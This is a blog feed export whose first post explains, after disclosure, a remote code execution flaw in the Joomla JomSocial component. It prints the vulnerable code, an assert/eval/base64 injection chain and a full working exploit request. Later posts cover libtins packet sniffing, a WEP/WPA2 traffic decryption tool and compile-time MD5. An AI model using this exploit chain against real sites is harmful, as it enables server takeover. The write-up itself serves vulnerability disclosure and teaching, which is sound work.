tag:blogger.com,1999:blog-68068680228850602692024-02-26T04:02:37.330-03:00Average coderA blog in which I post the stuff I do in my free time. This includes security, networking and C++.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.comBlogger17125tag:blogger.com,1999:blog-6806868022885060269.post-6304310766393906552014-01-30T21:10:00.000-03:002014-04-10T13:43:32.725-03:00Exploiting a code execution in JomSocial < 3.1.0.4<b>Update, February 4th: </b>JomSocial has just released a <a href="http://www.jomsocial.com/blog/hot-fix-3-1-0-4">patch for this vulnerability</a>. We contacted them a month after the initial contact and they said that the issue had been fixed in the 3.1.0.1 release. The demo hosted on their site was no longer vulnerable(it still was in the first days of January), so we thought that the issue was indeed fixed. but unfortunately, it wasn't.<br />
<br />
Yesterday, <a href="https://github.com/samelat">Gaston Traberg</a> and I released an <a href="http://www.securityfocus.com/archive/1/530909/30/0/threaded">advisory</a> regarding a remote code execution vulnerability in the Joomla! JomSocial component, which affected all versions >= 2.6 and < 3.1.0.1. I don't usually like to write about the security vulnerabilities that I find and report, but this one was quite interesting to exploit.<br />
<br />
Note that we found this vulnerability by picking random, widespread, Joomla! components and auditing them. This was <b>not</b> a vulnerability found while trying to "hack into" a website. As soon as we found it, it was reported to the vendors.<br />
<br />
<h1 style="text-align: center;">
JomSocial</h1>
<br />
<a href="http://jomsocial.com/">JomSocial</a> is a component which turns your Joomla! installation into a Facebook-like social network. You've got photos, videos, walls, comments, etc. A lot of its code relies on ajax calls which build the <i>HTML</i> on the server side and gets rendered by the client's browser.<br />
<br />
Even though it is not a free product, its PHP code is licensed under GPLv2.<br />
<br />
<h1 style="text-align: center;">
Azrul system plugin</h1>
<br />
JomSocial relies on a plugin called "Azrul system" which has a module that automatically parses parameters and calls the appropriate function with the specified parameters. This is nice because developers don't have to explicitly parse them and dispatch to the right function; that's done transparently.<br />
<br />
Requests that will be parsed by this system contain parameters that look like this:<br />
<pre> option=community&
no_html=1&
task=azrul_ajax&
func=MODULE,FUNCTION&
TOKEN=1&
arg2=["_d_","PARAM1"]&
arg3=["_d_","PARAM2"]&
arg...</pre>
Where:<br />
<ul>
<li><i>MODULE</i> is the class that will handle the request. These classes have to be located in a specific directory, otherwise the request will fail.</li>
<li><i>FUNCTION</i> is the function defined in class <i>MODULE</i> that will be executed.</li>
<li><i>TOKEN</i> is an anti-<i>CSRF</i> token that the application assigns to each different session.</li>
<li><i>PARAM*</i> indicates the contents of each parameter. As you can see, every parameter is a <i>JSON</i>-encoded string. </li>
</ul>
So for example, this call:<br />
<pre> option=community&
no_html=1&
task=azrul_ajax&
func=Foo,Bar&
baz=1&
arg2=["_d_","Hello"]&
arg3=["_d_","World!"]</pre>
Would automatically call this function(as long as its defined in the right directory):<br />
<pre class="brush: php;">class Foo {
function Bar($str1, $str2) {
echo "$str1 $str2"; // would echo Hello World!
}
}</pre>
<br />
<h1 style="text-align: center;">
The vulnerability</h1>
<br />
So, while we were searching for calls to the common insecure functions, such as <i>eval</i>, <i>system</i>, <i>passthru</i>, etc. we came by a call to the PHP <a href="http://php.net/manual/en/function.call-user-func-array.php">call_user_func_array</a> function. This call was performed in the <i>CommunityPhotosController::ajaxUploadAvatar</i> member function, and it looked like this:<br />
<br />
<pre class="brush: php;">// not relevant code has been removed
public function ajaxUploadAvatar($type, $id, $custom = '') {
$aCustom = json_decode($custom, true);
$cTable = JTable::getInstance(ucfirst($type), 'CTable');
$cTable->load($id);
if (isset($aCustom['call'])) {
if (isset($aCustom['call'][0]) && isset($aCustom['call'][1])) {
$obj = $aCustom['call'][0];
$method = $aCustom['call'][1];
$params = count($aCustom['call']) > 2 ? array_slice($aCustom['call'], 2) : array();
if (!empty($obj) && !empty($method)) {
$customHTML = call_user_func_array(array($obj, $method), $params);
}
}
}
}
</pre>
<br />
So as you can see, the function does the following: <br />
<ul>
<li>Loads an object representing a database table with the name $type and loads the record with id $id.</li>
<li>JSON-decodes its third parameter.</li>
<li>If there is a "call" key in the JSON-decoded string, it assumes the value for that key will be an array, and tests to see if there are at least 2 elements in it.</li>
<li>The first element of that array will indicate the name of an object or class and the second one, a name of a method, apparently.</li>
<li>The rest of the parameters will be parameters for that method.</li>
<li>Finally, if everything went well, it calls <i>call_user_func_array</i> using the provided data.</li>
</ul>
This already looks pretty insecure. We can basically indicate any class name, method and parameters, and we'll be able to execute it. All that's left now is to find a class function that allows us to do interesting stuff, like executing arbitrary PHP code.<br />
<br />
<h1 style="text-align: center;">
Exploiting it</h1>
<br />
We started searching for calls to more severe functions that would give us complete control over the application, such as <i>eval</i> or <i>system</i>. Of course, we can't call them directly, since we need to call methods defined inside a class, and those are free functions.<br />
<br />
At that point, we found a method, <i>_runCommand</i> defined in the <i>CVideos</i> class. It's not a static one, meaning that we should need an instance of an object to call it(at least in theory), but apparently PHP allowed us to do so. Unfortunately, before making a call to <i>system</i>, this function accessed <i>$this</i>, and since there was no <i>$this</i> here(since there's no instance associated with the call), that would trigger a fatal PHP error.<br />
<br />
So we kept on looking and found a very interesting function, <i>CStringHelper::escape</i> which looks like this:
<br />
<pre class="brush: php;">static function escape($var, $function='htmlspecialchars')
{
// four unrelevant lines removed here
return call_user_func($function, $var);
}</pre>
As you can see, it uses <i>call_user_func</i> using the second parameter as the name of the function to call, and the first parameter as its argument. So that's it, if we managed to call this function and provide a non-class function name(such as <i>eval</i>) and some PHP code, we should be able to get it to execute on the server.<br />
<br />
<h1 style="text-align: center;">
Not so fast</h1>
<br />
Unfortunately, it seems like, since PHP's <i><a href="http://www.php.net/eval">eval</a></i> function is actually a language construct rather than a real function, you can't call it this way. For example, if you call it through <i>call_user_func</i>, like this:<br />
<pre class="brush: php;"><?php
call_user_func("eval", "echo 'Hello world';");
?></pre>
<br />
You'll get an error like the following one:<br />
<blockquote>
<b>PHP Warning</b>: <i>call_user_func()</i> expects parameter 1 to be a valid callback, function 'eval' not found or invalid function name in test.php on line 2</blockquote>
So that doesn't work. Of course we can already call <i>system</i>, <i>shell_exec</i>, <i>passthru</i>, etc. but it's always better to be able to execute PHP code, since it's common for those functions to be disabled. We needed a way to execute arbitrary code that didn't require the use of <i>eval</i>, or at least not directly...<br />
<br />
There's another function, <a href="http://www.php.net/manual/en/function.assert.php"><i>assert</i></a> which has some common behavior with <i>eval</i>: it evaluates its parameter as PHP code and stops the execution unless the evaluated expression returns a <i>true</i> boolean value. Using this function we can do something like this:<br />
<pre class="brush: php;"><?php
assert("eval('echo 123;');");
?></pre>
<br />
Which looks strange but does execute the <i>echo</i>. Unfortunately, since <i>eval</i> always returns <i>NULL</i> unless you're using <i>return </i>statement in the eval'd code, this will always generate a warning, since <i>NULL</i> is implicitly converted to false, making the assertion fail.<br />
<br />
We could stop now, since we already reached PHP code execution, but it's better if our exploit doesn't leave traces in logs as well. Moreover, our PHP code has to be composed of only one expression, since the following code:<br />
<pre class="brush: php;"><?php
assert("eval('echo 123;'); eval('echo 456;');");
?></pre>
<br />
Will only print "123", as the assertion fails before the second eval is executed. <br />
<br />
So what we need is a way to execute an arbitrary piece of code which consists of only one expression, doesn't generate any warnings and always returns <i>true</i>.<br />
<br />
Actually, we could make it never return as well, right? We could call <i><a href="http://www.php.net/exit">exit</a> </i>inside the expression, which will stop the execution before the assertion fails. <i>exit</i> takes a parameter, so we could nest another function call as its parameter. Something like this:
<br />
<pre class="brush: php;">assert("exit(foo());");
</pre>
What if the nested function was <i>eval</i>? We'd already be able to execute arbitrary code! So doing this should work:
<br />
<pre class="brush: php;">assert("exit(eval('echo 123'));");
</pre>
In the end, what we came up with was the following:<br />
<pre class="brush: php;"><?php
assert("@exit(@eval(@base64_decode('BASE64_ENCODED_SCRIPT')))");
?></pre>
The extra <i>base64</i> encoding was used so that we didn't even need to encode quotes, or any other character that could cause troubles. Note that the extra "@" characters force the PHP interpreter to supress any error messages that might be generated while executing our code.<br />
<br />
<h1 style="text-align: center;">
Putting it all together</h1>
<br />
Now that we know how to execute any piece of PHP code, we need to build a request that does so. In order to do that, we need:<br />
<ul>
<li>A valid anti-CSRF token. We can find that token by making any request and analyzing the output. There will be a hidden input, whose name is a 32 long hex-characters string and its value will be 1. The name of the input is the token. </li>
<li>A valid table name, so that <i>JTable::getInstance</i> returns a valid object. Otherwise, when later calling <i>JTable::load</i> will trigger an error. In this case, we'll use the table "Events".</li>
<li>Since <i>JTable::load</i> doesn't throw an exception when there is no record with the given id, we can use any number. Besides, the retrieved record is not used before the call to <i>call_user_func_array.</i></li>
<li>We need to <i>base64</i> encode the PHP code, and insert it inside our payload.</li>
<li>Finally, we need to build an associative array which has a key "call" which maps to a list which contains the name of the class we'll use(<i>CStringHelper</i>), the name of the method to call(<i>escape</i>), , the payload generated in the previous step and the string "assert".</li>
</ul>
The complete request would look like the following:<br />
<br />
<blockquote>
POST /index.php HTTP/1.0<br />
Host: example.com<br />
... <br />
<br />
option=community&<br />
no_html=1&<br />
task=azrul_ajax&<br />
func=photos,ajaxUploadAvatar&<br />
TOKEN=1&<br />
arg2=["_d_","Event"]&<br />
arg3=["_d_","374"]&<br />
arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]</blockquote>
The decoded payload(it's just an <i>echo</i>) looks like this:<br />
<pre class="brush: python">{
"call" : [
"CStringHelper",
"escape",
"@exit(@eval(@base64_decode('ZWNobyAnSGVsbG8gV29ybGQnOw==')));",
"assert"
]
}</pre>
<br />
Our code should be executed after that, so all that's left is to parse the output. I have uploaded a <a href="https://github.com/mfontanini/Programs-Scripts/blob/master/JomSocial-Exploit/exploit.py">working python exploit</a> to my github account.Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com11tag:blogger.com,1999:blog-6806868022885060269.post-4357324898200367422013-10-26T12:41:00.001-03:002017-05-02T14:25:17.073-03:00Creating a simple and fast packet sniffer in C++I have seen several articles on the web about writing packet sniffers using C and C++ which suggest using raw sockets and dealing with protocol headers and endianness yourself. This is not only very tedious but also there are libraries which already deal with that for you and make it extremely easy to work with network packets.<br />
<br />
One of them is <a href="http://libtins.github.io/">libtins</a>, a library I have been actively developing for the past few years. It has support for several protocols, including <i>Ethernet</i>, <i>IP</i>, <i>IPv6</i>, <i>TCP</i>, <i>UDP</i>, <i>DHCP</i>, <i>DNS </i>and<i> IEEE 802.11</i>, and it works on <i>GNU/Linux</i>, <i>Windows</i>, <i>OSX</i> and <i>FreeBSD</i>. It even works on different architectures such as <i>ARM </i>and <i>MIPS</i>, so you could go ahead and develop some application which could be executed inside routers and other devices.<br />
<br />
Let's see how you would sniff some <i>TCP</i> packets and print their source and destination port and addresses:<br />
<pre class="brush: c++;">#include <iostream>
#include <tins/tins.h>
</pre>
<pre class="brush: c++;"><pre class="brush: c++;">using namespace std;</pre>
using namespace Tins;</pre>
<pre class="brush: c++;">
bool callback(const PDU &pdu) {
const IP &ip = pdu.rfind_pdu<IP>();
const TCP &tcp = pdu.rfind_pdu<TCP>();
cout << ip.src_addr() << ':' << tcp.sport() << " -> "
<< ip.dst_addr() << ':' << tcp.dport() << endl;
return true;
}
int main() {
// Sniff on interface eth0
Sniffer sniffer("eth0");
sniffer.sniff_loop(callback);
}</pre>
This is the output I get when executing it:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQXmsINWD-_rIXQa3GF0tvmghyjIHwRa08hyphenhyphenGcfWQnifn5B4c0F2QfpHRfMoWCNrrkoyaqpOB_Aif-pyLQE2sPPZ4B4OR9iXJJfM_sO_DHjnxsY0cl47EanXocrEm8uMXFXDo84GIVBPHy/s1600/sniffing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQXmsINWD-_rIXQa3GF0tvmghyjIHwRa08hyphenhyphenGcfWQnifn5B4c0F2QfpHRfMoWCNrrkoyaqpOB_Aif-pyLQE2sPPZ4B4OR9iXJJfM_sO_DHjnxsY0cl47EanXocrEm8uMXFXDo84GIVBPHy/s400/sniffing.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
As you can see, it's fairly simple. Let's go through the snippet and see what it's doing:<br />
<ul>
<li>The <i>callback</i> function is the one that <i>libtins </i>will call for us each time a new packet is sniffed. It returns a boolean, whch indicates whether sniffing should go on or not, and takes a parameter of type <i>PDU</i>, which will hold the sniffed packet. This library represents packets as a series of Protocol Data Units(<i>PDU</i>) stacked over each other. So in this case, every packet would contain an <i>EthernetII</i>, <i>IP</i> and <i>TCP</i> <i>PDUs.</i></li>
<li>Inside <i>callback</i>'s body, you can see that we're calling <i>PDU::rfind_pdu</i>. This is a member function template which looks for the provided <i>PDU</i> type inside the packet, and returns a reference to it. So in the first two lines we're retrieving the <i>IP</i> and <i>TCP</i> layers, and then we're simply printing the addresses and ports.</li>
<li>Finally, in <i>main</i> an object of type <i>Sniffer </i>is constructed. When constructing it, we indicate that we want to sniff on interface <i>eth0</i>. After that, <i>Sniffer::sniff_loop</i> is called, which will start sniffing packets and calling our callback for each of them.</li>
</ul>
Note that this example will run successfully on any of the supported operating systems(as long as you use the right interface name, of course). The endianness of each of the printed fields is handled internally by the library, so you don't even have to worry about making your code work in <i>Big Endian</i> architectures. <br />
<br />
Now, you may be wondering whether using <i>libtins</i> will make your code significantly slower. If that is your concern, then you should not worry about it at all! This library was designed keeping efficiency in mind at all times. As a consequence it's the fastest packet sniffing and interpretation library I've tried out (note that I tried several, such as <a href="http://www.secdev.org/projects/scapy/">scapy</a>, <a href="http://code.google.com/p/dpkt/">dpkt</a>, <a href="http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=tool&name=Impacket">impacket</a> and <a href="http://code.google.com/p/libcrafter/%E2%80%8E">libcrafter</a>). Go ahead and have a look at <a href="http://libtins.github.io/benchmark/">these benchmarks</a> to see how fast it actually works. <br />
<br />
<i>libtins </i>allows you to implement fast packet sniffers in very few lines of code. It also supports additional features like <a href="http://libtins.github.io/tutorial/tcp-streams/">reassembling and following TCP streams</a>, <a href="http://libtins.github.io/tutorial/802.11/#decrypting-wpa">decrypting WPA2 traffic</a> (both TKIP and AES) and defragmenting IP datagrams.<br />
<br />
If you want to learn more about <i>libtins</i>, please visit <a href="http://libtins.github.io/tutorial/">this tutorial</a>, which covers everything you should know before starting to develop your network sniffing application! Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com11tag:blogger.com,1999:blog-6806868022885060269.post-35173166160693247782013-06-04T23:42:00.003-03:002013-11-24T13:11:23.456-03:00Decrypting WEP/WPA2 traffic on the flyThis is the first application I've developed using <a href="http://libtins.github.io/">libtins</a>, a packet crafting and sniffing library I've been developing for a while. In the latest release of that library, I've added support for <i>WPA2</i> decryption, so this application does very few things and does not handle encription at all; the library does so.<br />
<br />
The decryption of <i>WEP</i> and <i>WPA2</i> traffic has been available for a while now. Applications such as <a href="http://www.wireshark.org/">wireshark, tshark</a> and <a href="http://www.aircrack-ng.org/">airdecap</a> have supported this for quite some time. However, after adding this decryption feature to libtins, I wondered why there were no applications that let you decrypt the traffic directly from a network interface and make it available, decrypted, for any other application. This is where <a href="https://github.com/mfontanini/dot11decrypt">dot11decrypt</a> was born.<br />
<h3>
</h3>
<h3>
Objective</h3>
<br />
The application sniffs a network interface looking for <i>WEP</i> and <i>WPA2</i> encrypted traffic. It also analyzes EAPOL(802.1X) handshakes in order to track the <i>nonces</i> shared by peers, which will later be necessary while decrypting <i>WPA2</i>.<br />
<br />
Once a packet is decrypted successfully, the 802.11 frame is replaced by an <i>Ethernet</i> header, and the whole packet is written to a <i>tap</i> interface. You now can read those decrypted packets using any other tool, such as <i>Wireshark</i> or <i>ngrep</i>, and perform any kind of analysis.<br />
<br />
<h3>
What is required for decryption </h3>
<h3>
</h3>
<i>dot11decrypt</i> <b>does not crack<i> </i></b>any of the above mentioned encryption algorithms. So if you're looking for a wireless cracking tool, then this is not one of them.<br />
<br />
In order to crack <i>WEP</i> encrypted traffic, you need to provide the access point's <i>BSSID</i> and the <i>WEP</i> key. The syntax required to indicate that decryption data is the following:<br />
<blockquote class="tr_bq">
wep:[BSSID]:[KEY]</blockquote>
For example:<br />
<blockquote class="tr_bq">
wep:00:01:02:03:04:05:mypassword</blockquote>
Indicates that the access point whose <i>BSSID</i> is "00:01:02:03:04:05" uses WEP encryption and the <i>WEP</i> key is "mypassword".<br />
<br />
On the other hand, <i>WPA2</i> traffic is a little bit more complex. In order to generate the first set of keys required to decrypt the traffic(the <span class="st"><i>Pairwise Master Key </i>or<i> PMK</i></span>), both the pre-shared key and the network <i>SSID</i>(you network's "name") are required.<br />
<br />
In order to specify both of this attributes, the following syntax is used:<br />
<blockquote class="tr_bq">
wpa:[SSID]:[PSK]</blockquote>
As an example:<br />
<blockquote class="tr_bq">
wpa:MyAccessPoint:MySecretKey</blockquote>
Indicates that any access point which broadcast the <i>SSID</i> "MyAccessPoint" will be decrypted, assuming the <i>PSK</i> is "MySecretKey".<br />
<br />
<h3>
How it works</h3>
<h3>
</h3>
Decrypting <i>WEP</i> frames is fairly simple, given the <i>WEP</i> key, it's just using <i>RC4</i> over the encrypted data.<br />
<br />
Decrypting <i>WPA2</i>, however, is a little bit trickier. In order to decrypt a <i>WPA2</i> encrypted frame, the following is required:<br />
<br />
<ul>
<li>The <i>PMK</i>(mentioned a few lines above).</li>
<li>The association <i>SSID</i> -> <i>BSSID</i>.</li>
<li>A valid 4-way handshake between the client which sends or is about to receive that frame.</li>
</ul>
The application initially computes the <i>PMK</i>. Since you only provide the network <i>SSID</i>, then the application will look for beacon frames so as to know which <i>BSSID</i> is broadcasting the given <i>SSID</i>.<br />
<br />
After that, when a client performs a handshake against those <i>BSSID</i>s, a <span class="st"><i>Pairwise Transient</i> Key(<i>PTK</i>)</span> is computed and stored. At that point, any packet sent from or to the associated client will be decrypted using that <i>PTK</i>. If any client is deauthenticated and then authenticated again, that new handshake will be taken into account and used to decrypt its packets.<br />
<br />
Luckily for us, all of the above mentioned is already implemented and performed automatically by <i>libtins</i>: inspecting beacon frames looking for the <i>SSID</i>, capturing 4-way handshakes and decrypting the traffic. If you want to have a look at that code, have a look at the <a href="http://sourceforge.net/p/libtins/code/ci/master/tree/src/crypto.cpp">WPA2Decrypter</a> class.<br />
<br />
Note that <i>WPA2</i> decryption works for both <i>AES</i>(<i>CCMP</i>) and <i>TKIP</i> encrypted frames, so this works for <i>WPA</i> as well(since this uses <i>TKIP</i>).<br />
<br />
<h3>
Compiling the application</h3>
<h3>
</h3>
In order to compile <i>dot11decrypt</i>, the latest version of <i>libtins</i> is required(version 1.1 at the moment of writing). You can download it from the <a href="https://github.com/mfontanini/libtins">project's github entry</a>. The library must be compiled using support for <i>WPA2</i> decryption(this is enabled by default).<br />
<br />
Since the application uses some C++11 features, a fairly recent C++ compiler is needed as well. g++ 4.6 is enough. g++ 4.5 might do.<br />
<br />
<i>dot11decrypt</i>'s source code can be downloaded from <a href="https://github.com/mfontanini/dot11decrypt">github</a>. After you've got these, just go ahead and do the usual:<br />
<blockquote class="tr_bq">
./configure<br />
make </blockquote>
<h3>
Using it</h3>
<h3>
</h3>
The application takes as its first argument, the interface in which to listen for packets. This must be a wireless interface in monitor mode. The rest of the arguments specify the data which will be used to decrypt the data, using the syntax mentioned near the beginning of this post:<br />
<blockquote class="tr_bq">
./dot11decrypt wlan0 wpa:MyAccessPoint:some_password<br />
./dot11decrypt mon0 wep:00:01:02:03:04:05:blahbleehh</blockquote>
After running it, you'll get an output similar to the following:<br />
<blockquote class="tr_bq">
Using device: tap0<br />
Device is up.</blockquote>
The <i>tap0</i> interface will now be used to output the decrypted traffic. <i>tcpdump</i> or any other network sniffing tool can be used to process the data. Note that the 802.11(and possibly the RadioTap encapsulation used) and LLC+SNAP frames will be removed and replaced by an Ethernet header. <br />
<br />
Note that you require either <i>root</i> privileges or the <i>CAP_NET_ADMIN</i> capability on the executable to run this application successfully.<br />
<br />
<h3>
Example </h3>
<h3>
</h3>
In this example, I'm going to sniff and decrypt the traffic sent from my phone.<br />
<br />
The <i>mon0</i> interface, the one I'll be using, is in monitor mode. This is the output of running <i>tcpdump</i> on that interface, filtering only IEEE 802.11 data frames for which the second address in that frame is the access point's <i>BSSID</i>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFCij7BsJ5a2Pv041SAySAqsjkAfp8VYMJ7-ptQPvnIqgz_E5ai7EEivA1oELUpqXNDrpM65a-G_PDgx5t4Dwr_dSsOcGP2hQfFk8HvBvj9ZxpPwpYsN18wwkcwUFN1u0YjWL0u_5TghZm/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFCij7BsJ5a2Pv041SAySAqsjkAfp8VYMJ7-ptQPvnIqgz_E5ai7EEivA1oELUpqXNDrpM65a-G_PDgx5t4Dwr_dSsOcGP2hQfFk8HvBvj9ZxpPwpYsN18wwkcwUFN1u0YjWL0u_5TghZm/s640/1.png" width="640" /></a></div>
<br />
As you can see, there are several Dot11 QoS Data frames, all of them encrypted.<br />
<br />
Now, I'm going to execute <i>dot11decrypt</i> providing the <i>SSID</i> and the <i>WPA2 PSK</i>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim29U2yhKnr12p9qBBbPqbmDfDAhOIvaMHkGiJ4rwEmo5edZcjmH1rjTrlwRiESUrkaaY-6ErLwWKDtjTPThVnw-ALSHZ_f25O_epZWR7DNCjjHvnbuThLsVEkkQaBi1rgzeI8K2UDxEmW/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="65" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEim29U2yhKnr12p9qBBbPqbmDfDAhOIvaMHkGiJ4rwEmo5edZcjmH1rjTrlwRiESUrkaaY-6ErLwWKDtjTPThVnw-ALSHZ_f25O_epZWR7DNCjjHvnbuThLsVEkkQaBi1rgzeI8K2UDxEmW/s640/2.png" width="640" /></a></div>
<br />
A new <i>tap</i> interface has been created, named <i>tap0</i>. Every decrypted packet will be written to it.<br />
<br />
At this point, I connected my phone to the access point. The application captures the 802.1X handshake and it will start decrypting the traffic. In the image below, you can see how the traffic sniffed from the <i>tap0</i> interface is no longed encrypted:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDgVpRbkLYHpjhrxGtyxmAMj5_CzexYCwmLUD1TORhQluvKwQn2M-Byv1AFSecN_y9KZdjxgbMcjz5_bjpyg1hMO8ZqdxNJwvVwjutfUe8OJ0g3ssO1fQBdPV8eTFctpg-4b1ljKrQ4WMD/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDgVpRbkLYHpjhrxGtyxmAMj5_CzexYCwmLUD1TORhQluvKwQn2M-Byv1AFSecN_y9KZdjxgbMcjz5_bjpyg1hMO8ZqdxNJwvVwjutfUe8OJ0g3ssO1fQBdPV8eTFctpg-4b1ljKrQ4WMD/s640/3.png" width="640" /></a></div>
<br />
I hope you find this application useful!Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com43tag:blogger.com,1999:blog-6806868022885060269.post-36743840795969516462012-10-21T10:40:00.000-03:002013-11-24T13:11:48.680-03:00libtins v0.2 releasedAfter coding and testing <a href="http://libtins.github.io/"><i>libtins</i></a> a lot in the past months, we're proud to announce the release of the 0.2 version. <i>libtins</i> is a network packet crafting and sniffing library. It allows you to forge packets with very little effort, forgetting about each protocol data unit's endianness, internal representation, etc.<br />
<br />
In this release, there have been several changes:<br />
<br />
<ul>
<li>IP and hardware addresses can now be handled easily. Instead of using pointers or integral values to represent them, there's now a class which abstract each of them, making it easy to create them from their string representations, and compare them. You can now use hardware addresses as keys inside <i>std::map</i>s, or insert them in <i>std::set</i>s.</li>
<li>Added support for big endian architectures. We've worked hard to make sure every getter, setter and function available handles endianness correctly. Now you can create tools and run them on both little and big endian architectures, without worrying about it.</li>
<li>Generalized and simplified some interfaces. The <i>Sniffer</i> class required you to inherit a class from an <i>AbstractSnifferHandler</i> just to perform a call to <i>Sniffer::sniff_loop</i>. Now this function takes a template functor argument and calls it every time a new packet is sniffed off the wire, making your life <i>a lot</i> easier.</li>
<li>Network interfaces used to be handled internally by each <i>PDU</i>. Classes would usually take a <i>std::string</i>, look up the corresponding interface index and store it, and also provide overloads that took directly the integral index. Now there's a <i>NetworkInterface</i> class which does this job internally. So <i>PDU</i>s now take objects of this type rather than providing several overloads(which in cases like the <i>Dot11</i> class hierarchy, reduces the boilerplate code significantly).</li>
<li>You can now follow TCP streams on the fly. There's a TCPStreamFollower class that sniffs packets(either from a network interface or a pcap file), and reassembles TCP streams, executing a callback whenever there's data available.</li>
<li>We're planning to allow decrypting any 802.11 encrypted data frame on the fly. In this release, by providing tuples <i>(bssid, password)</i>, you can decrypt WEP-encrypted frames while sniffing, in a completely transparent way. I'll soon add an example in the <i>libtins</i> website on how to do that.</li>
<li>We've added support for some new <i>PDU</i>s: Null/Loopback, IEEE 802.3, LLC and DNS.</li>
<li>You can now read and write pcap files, using a very simple interface. </li>
<li>Finally, there's been a huge refactoring on the entire code. Code has been RAII'd a lot. There are less pointers moving around, more automatic storage objects and references. </li>
</ul>
In case you want to try the library out, please visit its <a href="http://libtins.github.io/">website</a> and download the latest version. Average Coderhttp://www.blogger.com/profile/11661490046382270751noreply@blogger.com0tag:blogger.com,1999:blog-6806868022885060269.post-75396380245142085522012-08-30T22:11:00.000-03:002012-08-31T19:12:11.170-03:00Compile time MD5 using constexprToday, someone on stackoverflow <a href="http://stackoverflow.com/questions/12198808/hash-template-metafunction-and-function/12199522">asked</a> how to perform compile-time hashing in C++. After providing a small, naive, example in my answer, I thought it would actually be interesting to implement some well known hashing algorithm using C++11 features, such as <i>constexpr</i>. So I gave <i>MD5</i> a try, and after some hours of trying stuff, I was able to create compile-time <i>MD5</i> hashes.<br />
<br />
<h3 style="text-align: center;">
The MD5 hashing algorithm.</h3>
<br />
Implementing the algorithm itself was not as hard as I thought it would be. The algorithm is roughly like this:<br />
<ol>
<li>It starts with 4 32-bits integers which contain a predefined value.</li>
<li>The algorithm contains 4 "rounds". On each of them, a different function is applied to those integers and the input string.</li>
<li>The result of those rounds serves as input to the next ones.</li>
<li>Add the 4 resulting 32-bit integers with the original, predefined integer values.</li>
<li>Interpret the resulting integers as a chunk of 16 bytes.</li>
</ol>
That's it. Note that I've somehow stripped down the algorithm to short strings. A real implementation would iterate several times doing the same stuff on the entire buffer. But since nobody is going to hash large strings on compile time, I've simplified the algorithm a little bit.<br />
<br />
<h3 style="text-align: center;">
The implementation </h3>
<br />
So basically the implementation was not that hard, some <i>template metaprogramming</i> and several <i>constexpr</i> functions. Since there was a pattern on the way the arguments were provided as input to the functions in each round, I used a specialization which avoided lots of repeated code.<br />
<br />
The worst part was generating the input for that algorithm. The input is not just the string which is to be hashed. The steps to generate that input is roughly as follows:<br />
<ol>
<li>Create a buffer of 64 bytes, filled with zeros.</li>
<li>Copy the input string into the start of the buffer.</li>
<li>Add a <i>0x80</i> character on <i>buffer[size_of_input_string]</i>.</li>
<li>On <i>buffer[56]</i>, the value <i>sizeof_input_string * 8</i> must be stored.</li>
</ol>
That's all. The algorithm will only work with strings of no more than 31 bytes. It could be generalized by modifying the appropriate bytes on <i>buffer[57:60]</i>, but that was not my objective.<br />
<br />
In order to achieve this buffer initialization, I had to somehow decompose the input string into characters, and then join them and those special bytes, into an array which could be used during compile time. In order to achieve this, I implemented a <i>constexpr_array</i>, which is just a wrapper to a built-in array, but provides a <i>data()</i> <i>constexpr</i> member, something that <i>std::array</i> does not have(I'm not really sure why):<br />
<pre class="brush: c++;">template<typename T, size_t n>
struct constexpr_array {
const T array[n];
constexpr const T *data() const {
return array;
}
};</pre>
The decomposition ended up pretty simple, but I had to struggle to figure out how the hell to implement it.<br />
<br />
Finally, the interface for the compile time <i>MD5</i> would be the following:<br />
<pre class="brush:c++;">template<size_t n> constexpr md5_type md5(const char (&data)[n]) </pre>
<br />
The <i>typedef</i> for the function's result is the following:<br />
<pre class="brush:c++;">typedef std::array<char, 16> md5_type;</pre>
<br />
Note that everything in the implementation resides in namespace <i>ConstexprHashes</i>. <br />
<br />
As an example, this code generates a hash and prints it:<br />
<pre class="brush:c++">#include <iostream>
#include "md5.h"
int main() {
constexpr auto value = ConstexprHashes::md5("constexpr rulz");
std::cout << std::hex;
for(auto v : value) {
if(((size_t)v & 0xff) < 0x10)
std::cout << '0';
std::cout << ((size_t)v & 0xff);
}
std::cout << std::endl;
}</pre>
<br />
This prints out: "b8b4e2be16d2b11a5902b80f9c0fe6d6", which is the right hash for "constexpr rulz".<br />
<br />
Unluckily, the only compiler that is able to compile this is clang 3.1(I haven't tested it on newer versions). GCC doesn't like the code, and believes some <i>constexpr</i> stuff is actually <i>non-constexpr</i>. I'm not 100% sure that clang is the one that's right, but it looks like it is.<br />
<br />
You can find the <b><i>MD5</i> implementation</b> <a href="https://github.com/mfontanini/Programs-Scripts/blob/master/constexpr_hashes/md5.h">here</a>. Maybe I'll implement <i>SHA1</i> soon, whenever I have some time.<br />
<br />
